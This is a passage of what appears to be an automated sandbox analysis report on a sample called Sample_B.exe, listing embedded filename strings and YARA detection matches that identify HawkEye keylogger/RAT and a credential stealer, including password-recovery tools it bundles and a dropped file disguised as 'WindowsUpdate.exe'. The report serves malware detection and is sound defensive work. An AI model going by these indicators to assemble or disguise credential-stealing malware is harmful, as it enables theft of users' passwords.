                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFirewallAPI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskhost.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUSERINIT.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSCMS.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamej% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMsCtfMonitor.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesnmptrap.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelmhsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedwm.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedhcpcore.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepeerdistsh.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameNetLogon.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesstpsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelocalspl.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFXSRESM.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskeng.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWsdMon.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamevsstrace.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWLDAP32.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenetprofm.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameThemeUI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameExplorerFrame.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameesrb.dll.muiH vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamexpsrchvw.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamestobject.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamerasdlg.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAltTab.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewscui.cpl.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameHCPROVIDERS.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSearchIndexer.exe.mui@ vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePNIDUI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametquery.dll.mui@ vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameesent.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesidebar.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMsMpRes.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametwext.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamempr.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameschedsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFDResPub.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFunDisc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamerpcrt4.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFDPrint.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameBASEBRD.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameimageres.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWINMM.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameDocumentPerformanceEvents.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWerConCpl.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSHTML.DLL.MUID vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHSVCS.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskmgr.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSndVolSSO.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewin32spl.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameinetpp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameadvapi32.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameprovsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamep2pcollab.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameQAgentRT.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameDhcpQEC.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlasvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenapinsp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepnrpnsp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameFVEUI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamews2_32.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameiphlpapi.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWebServices.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedhcpcsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepcwum.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamefwpuclnt.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuserenv.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametsgqec.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCertEnrollj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewebio.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameperftrack.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCDOSYS.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedwmapi.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCertClij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamecimwin32.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegptext.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsobjs.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepnrpsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameazrolesj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedrt.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameNDIS.SYS.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePeerDistSvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWsmRes.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000000.2069282120.0000000000C42000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2076293431.0000000002050000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2075802327.0000000000464000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameehres.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMPSideShowGadgetj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameonex.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamethumbcache.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelocalsec.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUI0Detect.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWLANGPUI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSV1_0.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamehotplug.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSTI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmcss.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewuaueng.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameOLE32.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamew32time.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameslui.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUSERCPL.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskschd.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMDM.dll.muiZ vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebthci.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSHTMLER.DLL.MUID vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenapdsnap.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameREGSVC.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesbdropj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebrserid.sys.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamecomdlg32.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSXS.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedps.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMPNSCFG.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesdclt.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWEBCHECK.DLL.MUID vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAuxiliaryDisplayCpl.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMBLCTR.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameEFSADU.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWPDMTPDR.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameNetworkItemFactory.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSCTF.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaudiodev.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaelupsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamejscript.dll.muiH vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegpedit.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSOERES.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077020537.0000000004710000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Sample_B.exe
                          Source: Sample_B.exeBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs Sample_B.exe
                          Source: Sample_B.exeBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs Sample_B.exe
                          Source: Sample_B.exeBinary or memory string: OriginalFilenamemailpv.exe< vs Sample_B.exe
                          Source: Sample_B.exeBinary or memory string: OriginalFilenamePhulli.exe0 vs Sample_B.exe
                          Source: Sample_B.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: Sample_B.exe, type: SAMPLEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: Sample_B.exe, type: SAMPLEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: Sample_B.exe, type: SAMPLEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000002.00000002.2113607102.00000000046F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000002.00000002.2113562918.00000000046E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
